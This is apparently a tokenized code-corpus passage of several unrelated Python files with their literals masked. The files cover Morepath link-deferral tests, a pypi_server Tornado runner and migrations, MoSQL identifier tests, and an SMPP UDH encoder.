<EOL> return alpha ( ) <EOL> @ root . mount ( app = beta , path = '<STR_LIT>' ) <EOL> def mount_beta ( ) : <EOL> return beta ( ) <EOL> @ beta . defer_links ( model = AlphaModel ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent <EOL> @ root . defer_links ( model = AlphaModel ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_deferred_deferred_view ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> class beta ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . view ( AlphaModel ( ) ) <EOL> @ alpha . path ( path = '<STR_LIT>' ) <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> @ alpha . json ( model = AlphaModel ) <EOL> def alpha_model_default ( self , request ) : <EOL> return { "<STR_LIT>" : "<STR_LIT>" } <EOL> @ beta . path ( path = '<STR_LIT>' ) <EOL> class BetaModel ( object ) : <EOL> pass <EOL> @ beta . json ( model = BetaModel ) <EOL> def beta_model_default ( self , request ) : <EOL> return request . view ( AlphaModel ( ) ) <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ root . mount ( app = beta , path = '<STR_LIT>' ) <EOL> def mount_beta ( ) : <EOL> return beta ( ) <EOL> @ beta . defer_links ( model = AlphaModel ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent <EOL> @ root . defer_links ( model = AlphaModel ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT>' : '<STR_LIT>' } <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == { '<STR_LIT>' : '<STR_LIT>' } <EOL> def test_deferred_view_has_app_of_defer ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> class beta ( morepath . App ) : <EOL> pass <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ root . mount ( app = beta , path = '<STR_LIT>' ) <EOL> def mount_beta ( ) : <EOL> return beta ( ) <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ alpha . path ( path = '<STR_LIT>' ) <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> @ alpha . json ( model = AlphaModel ) <EOL> def alpha_model_default ( self , request ) : <EOL> if request . app . __class__ == alpha : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> @ beta . path ( path = '<STR_LIT>' ) <EOL> class BetaModel ( object ) : <EOL> pass <EOL> @ beta . json ( model = BetaModel ) <EOL> def beta_model_default ( self , request ) : <EOL> return request . view ( AlphaModel ( ) ) <EOL> @ beta . defer_links ( model = AlphaModel ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent . child ( '<STR_LIT>' ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == '<STR_LIT>' <EOL> def test_deferred_loop ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> class Model ( object ) : <EOL> pass <EOL> @ root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( Model ( ) ) <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ alpha . defer_links ( model = Model ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent <EOL> @ root . defer_links ( model = Model ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> with pytest . raises ( LinkError ) : <EOL> c . get ( '<STR_LIT:/>' ) <EOL> def test_defer_link_scenario ( ) : <EOL> class App ( morepath . App ) : <EOL> pass <EOL> class Child ( morepath . App ) : <EOL> pass <EOL> class Document ( object ) : <EOL> pass <EOL> @ App . mount ( app = Child , path = '<STR_LIT>' ) <EOL> def mount_child ( ) : <EOL> return Child ( ) <EOL> @ App . defer_links ( model = Document ) <EOL> def defer_document ( app , doc ) : <EOL> return app . child ( Child ( ) ) <EOL> @ App . path ( path = '<STR_LIT>' ) <EOL> class Root ( object ) : <EOL> pass <EOL> @ App . json ( model = Root ) <EOL> def root_view ( self , request ) : <EOL> return { <EOL> '<STR_LIT>' : request . link ( Document ( ) ) , <EOL> '<STR_LIT>' : request . view ( Document ( ) ) <EOL> } <EOL> @ App . json ( model = Document ) <EOL> def app_document_default ( self , request ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> @ Child . path ( '<STR_LIT>' , model = Document ) <EOL> def get_document ( ) : <EOL> return Document ( ) <EOL> @ Child . json ( model = Document ) <EOL> def document_default ( self , request ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> c = Client ( App ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == { '<STR_LIT>' : '<STR_LIT>' } <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> def test_defer_class_links_without_variables ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . class_link ( SubModel ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_class_links ( model = SubModel , variables = lambda obj : { } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_class_links_with_variables ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . class_link ( SubModel , variables = dict ( name = '<STR_LIT:foo>' ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_class_links ( model = SubModel , <EOL> variables = lambda obj : { '<STR_LIT:name>' : obj . name } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_link_uses_defer_class_links ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( '<STR_LIT:foo>' ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_class_links ( model = SubModel , <EOL> variables = lambda obj : { '<STR_LIT:name>' : obj . name } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_links_and_defer_links_conflict ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( '<STR_LIT:foo>' ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . chidl ( Sub ( ) ) <EOL> @ Root . defer_class_links ( model = SubModel , <EOL> variables = lambda obj : { '<STR_LIT:name>' : obj . name } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> with pytest . raises ( ConflictError ) : <EOL> Root . commit ( ) </s>
<s> """<STR_LIT>""" <EOL> from . toposort import toposorted , Info <EOL> from . publish import publish <EOL> class TweenRegistry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _tween_infos = [ ] <EOL> def register_tween_factory ( self , tween_factory , over , under ) : <EOL> """<STR_LIT>""" <EOL> self . _tween_infos . append ( Info ( tween_factory , over , under ) ) <EOL> def sorted_tween_factories ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ info . key for info in toposorted ( self . _tween_infos ) ] <EOL> def wrap ( self , app ) : <EOL> """<STR_LIT>""" <EOL> result = publish <EOL> for tween_factory in reversed ( self . sorted_tween_factories ( ) ) : <EOL> result = tween_factory ( app , result ) <EOL> return result </s>
<s> data_help = '''<STR_LIT>''' <EOL> data_binary_help = '''<STR_LIT>''' <EOL> data_urlencode_help = '''<STR_LIT>''' <EOL> digest_help = '''<STR_LIT>''' <EOL> referer_help = '''<STR_LIT>''' <EOL> form_help = '''<STR_LIT>''' <EOL> get_help = '''<STR_LIT>''' <EOL> header_help = '''<STR_LIT>''' <EOL> head_help = '''<STR_LIT>''' <EOL> insecure_help = '''<STR_LIT>''' <EOL> output_help = '''<STR_LIT>''' <EOL> remote_name_help = '''<STR_LIT>''' <EOL> range_help = '''<STR_LIT>''' <EOL> user_help = '''<STR_LIT>''' <EOL> url_help = '''<STR_LIT>''' <EOL> request_help = '''<STR_LIT>''' <EOL> user_agent_help = '''<STR_LIT>''' </s>
<s> from setuptools import setup , find_packages <EOL> import clime <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = clime . __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> platforms = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> packages = find_packages ( ) , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> ) </s>
<s> from getpass import getuser <EOL> from random import randrange <EOL> from itertools import product <EOL> import mosql . util <EOL> import mosql . mysql <EOL> import mosql . std <EOL> def connect_to_postgresql ( ) : <EOL> import psycopg2 <EOL> conn = psycopg2 . connect ( user = getuser ( ) ) <EOL> cur = conn . cursor ( ) <EOL> cur . execute ( '<STR_LIT>' ) <EOL> server_encoding , = cur . fetchone ( ) <EOL> assert server_encoding == '<STR_LIT>' <EOL> cur . execute ( '<STR_LIT>' ) <EOL> client_encoding , = cur . fetchone ( ) <EOL> assert client_encoding == '<STR_LIT>' <EOL> cur . close ( ) <EOL> return conn <EOL> def make_identifier ( s ) : <EOL> if isinstance ( s , unicode ) : <EOL> s = s . encode ( '<STR_LIT:utf-8>' ) <EOL> return mosql . util . delimit_identifier ( <EOL> mosql . util . escape_identifier ( s ) <EOL> ) <EOL> DENO = <NUM_LIT:100> <EOL> POSTGRESQL_SLICE_SIZE = <NUM_LIT> <EOL> def gen_slice_for_postgresql ( s ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( s ) , POSTGRESQL_SLICE_SIZE ) : <EOL> yield s [ i : i + POSTGRESQL_SLICE_SIZE ] <EOL> def test_identifier_in_postgresql ( ) : <EOL> mosql . std . patch ( ) <EOL> conn = connect_to_postgresql ( ) <EOL> cur = conn . cursor ( ) <EOL> expected_text = u'<STR_LIT>' . join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> expected_text += u'<STR_LIT>' . join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> for sliced_expected_text in gen_slice_for_postgresql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '''<STR_LIT>''' ) <EOL> fetched_bytes , = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> conn . rollback ( ) <EOL> ascii_chars = [ unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ] <EOL> expected_text = u'<STR_LIT>' . join ( a + b for a , b in product ( ascii_chars , ascii_chars ) ) <EOL> for sliced_expected_text in gen_slice_for_postgresql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '''<STR_LIT>''' ) <EOL> fetched_bytes , = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> conn . rollback ( ) <EOL> cur . close ( ) <EOL> conn . close ( ) <EOL> def connect_to_mysql ( ) : <EOL> import MySQLdb <EOL> conn = MySQLdb . connect ( user = '<STR_LIT:root>' , db = '<STR_LIT:root>' ) <EOL> cur = conn . cursor ( ) <EOL> cur . execute ( '''<STR_LIT>''' ) <EOL> _ , character_set_connection = cur . fetchone ( ) <EOL> assert character_set_connection == '<STR_LIT:utf8>' <EOL> cur . close ( ) <EOL> return conn <EOL> MYSQL_SLICE_SIZE = <NUM_LIT:64> <EOL> def gen_slice_for_mysql ( s ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( s ) , MYSQL_SLICE_SIZE ) : <EOL> yield s [ i : i + MYSQL_SLICE_SIZE ] <EOL> MYSQL_SPACE_CHAR_SET = set ( u'<STR_LIT>' ) <EOL> def fix_mysql_space_char ( s ) : <EOL> to_check_pos = - <NUM_LIT:1> <EOL> while s [ to_check_pos ] in MYSQL_SPACE_CHAR_SET : <EOL> to_check_pos -= <NUM_LIT:1> <EOL> if to_check_pos == - <NUM_LIT:1> : <EOL> return s <EOL> pos = to_check_pos + <NUM_LIT:1> <EOL> return s [ pos : ] + s [ : pos ] <EOL> def test_identifier_in_mysql ( ) : <EOL> mosql . mysql . patch ( ) <EOL> conn = connect_to_mysql ( ) <EOL> cur = conn . cursor ( ) <EOL> expected_text = u'<STR_LIT>' . join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> expected_text += u'<STR_LIT>' . join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> for sliced_expected_text in gen_slice_for_mysql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> sliced_expected_text = fix_mysql_space_char ( sliced_expected_text ) <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '<STR_LIT>' ) <EOL> fetched_bytes , _ , _ , _ , _ , _ = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> cur . execute ( '<STR_LIT>' ) <EOL> ascii_chars = [ unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ] <EOL> expected_text = u'<STR_LIT>' . join ( a + b for a , b in product ( ascii_chars , ascii_chars ) ) <EOL> for sliced_expected_text in gen_slice_for_mysql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> sliced_expected_text = fix_mysql_space_char ( sliced_expected_text ) <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '<STR_LIT>' ) <EOL> fetched_bytes , _ , _ , _ , _ , _ = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> cur . execute ( '<STR_LIT>' ) <EOL> cur . close ( ) <EOL> conn . close ( ) </s>
<s> from pypi_server . db . migrator import migration <EOL> from pypi_server . db . packages import Package , PackageFile , PackageVersion <EOL> @ migration ( <NUM_LIT:3> ) <EOL> def create_package ( migrator , db ) : <EOL> db . create_tables ( [ Package ] ) <EOL> @ migration ( <NUM_LIT:4> ) <EOL> def create_package_version ( migrator , db ) : <EOL> db . create_tables ( [ PackageVersion ] ) <EOL> @ migration ( <NUM_LIT:5> ) <EOL> def create_package_file ( migrator , db ) : <EOL> db . create_tables ( [ PackageFile ] ) </s>
<s> import tempfile <EOL> import uuid <EOL> import errno <EOL> import signal <EOL> import pwd <EOL> import os <EOL> from slimurl import URL <EOL> from tornado . ioloop import IOLoop <EOL> from tornado . httpserver import HTTPServer <EOL> from tornado . log import gen_log as log <EOL> from tornado . options import options , define <EOL> from tornado . process import cpu_count <EOL> from tornado . concurrent import futures <EOL> from tornado . web import Application <EOL> from tornado . httpclient import AsyncHTTPClient <EOL> from tornado . ioloop import PeriodicCallback <EOL> from pypi_server import ROOT <EOL> from pypi_server . cache import HOUR , Cache <EOL> from pypi_server . handlers . pypi . proxy . client import PYPIClient <EOL> from pypi_server . db import init_db <EOL> from pypi_server . db . packages import PackageFile <EOL> from pypi_server import handlers <EOL> define ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> define ( "<STR_LIT:address>" , help = "<STR_LIT>" , <EOL> default = os . getenv ( '<STR_LIT>' , "<STR_LIT:127.0.0.1>" ) ) <EOL> define ( "<STR_LIT:port>" , help = "<STR_LIT>" , <EOL> type = int , default = int ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = bool ( os . getenv ( "<STR_LIT>" ) ) , type = bool ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = bool ( os . getenv ( "<STR_LIT>" , '<STR_LIT:0>' ) ) , type = bool ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = bool ( os . getenv ( '<STR_LIT>' , '<STR_LIT:1>' ) ) , type = bool ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> type = int , default = int ( os . getenv ( '<STR_LIT>' , cpu_count ( ) * <NUM_LIT:2> ) ) ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = os . getenv ( "<STR_LIT>" , uuid . uuid4 ( ) . bytes ) ) <EOL> define ( "<STR_LIT:user>" , help = "<STR_LIT>" , default = None ) <EOL> define ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , type = str , <EOL> default = os . path . abspath ( <EOL> os . getenv ( <EOL> "<STR_LIT>" , <EOL> os . path . join ( os . path . abspath ( os . path . curdir ) , '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> define ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , <EOL> type = URL , <EOL> default = os . getenv ( <EOL> "<STR_LIT>" , <EOL> URL ( <EOL> "<STR_LIT>" . format ( "<STR_LIT:/>" . join ( <EOL> os . path . split ( os . path . join ( os . path . abspath ( os . path . curdir ) , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ) ) <EOL> ) <EOL> ) <EOL> ) <EOL> define ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> default = int ( os . getenv ( "<STR_LIT>" , '<STR_LIT>' ) ) , type = int ) <EOL> define ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> default = URL ( os . getenv ( "<STR_LIT>" , '<STR_LIT>' ) ) , type = URL ) <EOL> default_cache_dir = os . path . join ( tempfile . gettempdir ( ) , '<STR_LIT>' ) <EOL> define ( <EOL> "<STR_LIT>" , <EOL> help = '<STR_LIT>' . format ( default_cache_dir ) , <EOL> default = default_cache_dir <EOL> ) <EOL> def create_app ( debug = False , secret = "<STR_LIT>" , gzip = False , ** kwargs ) : <EOL> return Application ( <EOL> base_dir = ROOT , <EOL> debug = debug , <EOL> reload = debug , <EOL> cookie_secret = secret , <EOL> template_path = os . path . join ( ROOT , '<STR_LIT>' ) , <EOL> default_handler_class = handlers . DefaultHandler , <EOL> gzip = gzip , <EOL> handlers = handlers . ROUTES , <EOL> options = options , <EOL> ** kwargs <EOL> ) <EOL> def run ( ) : <EOL> options . parse_command_line ( ) <EOL> if options . config : <EOL> options . parse_config_file ( options . config ) <EOL> options . storage = os . path . abspath ( options . storage ) <EOL> if os . getuid ( ) == <NUM_LIT:0> and options . user : <EOL> pw = pwd . getpwnam ( options . user ) <EOL> uid , gid = pw . pw_uid , pw . pw_gid <EOL> log . info ( "<STR_LIT>" , options . user , uid , gid ) <EOL> os . setgid ( uid ) <EOL> os . setuid ( uid ) <EOL> try : <EOL> if not all ( f ( options . storage ) for f in ( os . path . exists , os . path . isdir ) ) : <EOL> log . info ( '<STR_LIT>' , options . storage ) <EOL> os . makedirs ( options . storage ) <EOL> def on_interrupt ( * args ) : <EOL> log . warning ( "<STR_LIT>" ) <EOL> exit ( errno . EINTR ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> for sig in ( signal . SIGINT , signal . SIGTERM , signal . SIGQUIT ) : <EOL> signal . signal ( sig , on_interrupt ) <EOL> def handle_pdb ( sig , frame ) : <EOL> import pdb <EOL> pdb . Pdb ( ) . set_trace ( frame ) <EOL> if options . debug : <EOL> signal . signal ( signal . SIGUSR2 , handle_pdb ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> app = create_app ( <EOL> options . debug , <EOL> options . secret , <EOL> options . gzip , <EOL> ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> io_loop = IOLoop . current ( ) <EOL> io_loop . run_sync ( lambda : init_db ( options . database ) ) <EOL> if not ( os . path . exists ( options . cache_dir ) and os . path . isdir ( options . cache_dir ) ) : <EOL> os . makedirs ( options . cache_dir ) <EOL> Cache . CACHE_DIR = options . cache_dir <EOL> log . info ( "<STR_LIT>" , options . pool_size ) <EOL> handlers . base . BaseHandler . THREAD_POOL = futures . ThreadPoolExecutor ( options . pool_size ) <EOL> AsyncHTTPClient . configure ( None , max_clients = options . max_http_clients ) <EOL> PYPIClient . configure ( <EOL> options . pypi_server , <EOL> handlers . base . BaseHandler . THREAD_POOL <EOL> ) <EOL> pypi_updater = PeriodicCallback ( PYPIClient . packages , HOUR * <NUM_LIT:1000> , io_loop ) <EOL> io_loop . add_callback ( PYPIClient . packages ) <EOL> io_loop . add_callback ( pypi_updater . start ) <EOL> log . info ( "<STR_LIT>" , options . address , options . port ) <EOL> http_server = HTTPServer ( app , xheaders = options . proxy_mode ) <EOL> http_server . listen ( options . port , address = options . address ) <EOL> log . debug ( '<STR_LIT>' , options . storage ) <EOL> PackageFile . set_storage ( options . storage ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> io_loop . start ( ) <EOL> except Exception as e : <EOL> log . fatal ( "<STR_LIT>" ) <EOL> log . exception ( e ) <EOL> exit ( <NUM_LIT:1> ) <EOL> else : <EOL> exit ( <NUM_LIT:0> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> from amdevice import * <EOL> from afc import * <EOL> class AFCRoot ( AFC ) : <EOL> def __init__ ( self , amdevice ) : <EOL> s = amdevice . start_service ( u'<STR_LIT>' ) <EOL> if s is None : <EOL> raise RuntimeError ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> AFC . __init__ ( self , s ) </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from smpp . pdu import gsm_constants , gsm_types <EOL> from smpp . pdu . encoding import IEncoder <EOL> from smpp . pdu . error import PDUParseError <EOL> class UDHParseError ( Exception ) : <EOL> pass <EOL> class UDHInformationElementIdentifierUnknownError ( UDHParseError ) : <EOL> pass <EOL> class Int8Encoder ( IEncoder ) : <EOL> def encode ( self , value ) : <EOL> return struct . pack ( '<STR_LIT>' , value ) <EOL> def decode ( self , file ) : <EOL> byte = self . read ( file , <NUM_LIT:1> ) <EOL> return struct . unpack ( '<STR_LIT>' , byte ) [ <NUM_LIT:0> ] <EOL> class Int16Encoder ( IEncoder ) : <EOL> def encode ( self , value ) : <EOL> return struct . pack ( '<STR_LIT>' , value ) <EOL> def decode ( self , file ) : <EOL> bytes = self . read ( file , <NUM_LIT:2> ) <EOL> return struct . unpack ( '<STR_LIT>' , bytes ) [ <NUM_LIT:0> ] <EOL> class InformationElementIdentifierEncoder ( IEncoder ) : <EOL> int8Encoder = Int8Encoder ( ) <EOL> nameMap = gsm_constants . information_element_identifier_name_map <EOL> valueMap = gsm_constants . information_element_identifier_value_map <EOL> def encode ( self , value ) : <EOL> name = str ( value ) <EOL> if name not in self . nameMap : <EOL> raise ValueError ( "<STR_LIT>" % name ) <EOL> return self . int8Encoder . encode ( self . nameMap [ name ] ) <EOL> def decode ( self , file ) : <EOL> intVal = self . int8Encoder . decode ( file ) <EOL> if intVal not in self . valueMap : <EOL> errStr = "<STR_LIT>" % intVal <EOL> raise UDHInformationElementIdentifierUnknownError ( errStr ) <EOL> name = self . valueMap [ intVal ] <EOL> return getattr ( gsm_types . InformationElementIdentifier , name ) <EOL> class IEConcatenatedSMEncoder ( IEncoder ) : <EOL> int8Encoder = Int8Encoder ( ) <EOL> int16Encoder = Int16Encoder ( ) <EOL> def __init__ ( self , is16bitRefNum ) : <EOL> self . is16bitRefNum = is16bitRefNum <EOL> def encode ( self , cms ) : <EOL> bytes = '<STR_LIT>' <EOL> if self . is16bitRefNum : <EOL> bytes += self . int16Encoder . encode ( cms . referenceNum ) <EOL> else : <EOL> bytes += self . int8Encoder . encode ( cms . referenceNum ) <EOL> bytes += self . int8Encoder . encode ( cms . maximumNum ) <EOL> bytes += self . int8Encoder . encode ( cms . sequenceNum ) <EOL> return bytes <EOL> def decode ( self , file ) : <EOL> refNum = None <EOL> if self . is16bitRefNum : <EOL> refNum = self . int16Encoder . decode ( file ) <EOL> else : <EOL> refNum = self . int8Encoder . decode ( file ) <EOL> maxNum = self . int8Encoder . decode ( file ) <EOL> seqNum = self . int8Encoder . decode ( file ) <EOL> return gsm_types . IEConcatenatedSM ( refNum , maxNum , seqNum ) <EOL> class InformationElementEncoder ( IEncoder ) : <EOL> int8Encoder = Int8Encoder ( ) <EOL> iEIEncoder = InformationElementIdentifierEncoder ( ) <EOL> dataEncoders = { <EOL> gsm_types . InformationElementIdentifier . CONCATENATED_SM_8BIT_REF_NUM : IEConcatenatedSMEncoder ( False ) , <EOL> gsm_types . InformationElementIdentifier . CONCATENATED_SM_16BIT_REF_NUM : IEConcatenatedSMEncoder ( True ) , <EOL> } <EOL> def encode ( self , iElement ) : <EOL> dataBytes = None <EOL> if iElement . identifier in self . dataEncoders : <EOL> dataBytes = self . dataEncoders [ iElement . identifier ] . encode ( iElement . data ) <EOL> else : <EOL> dataBytes = iElement . data <EOL> length = len ( dataBytes ) <EOL> bytes = '<STR_LIT>' <EOL> bytes += self . iEIEncoder . encode ( iElement . identifier ) <EOL> bytes += self . int8Encoder . encode ( length ) <EOL> bytes += dataBytes <EOL> return bytes <EOL> def decode ( self , file ) : <EOL> fStart = file . tell ( ) <EOL> identifier = None <EOL> try : <EOL> identifier = self . iEIEncoder . decode ( file ) <EOL> except UDHInformationElementIdentifierUnknownError : <EOL> pass <EOL> length = self . int8Encoder . decode ( file ) <EOL> data = None <EOL> if identifier in self . dataEncoders : <EOL> data = self . dataEncoders [ identifier ] . decode ( file ) <EOL> elif length > <NUM_LIT:0> : <EOL> data = self . read 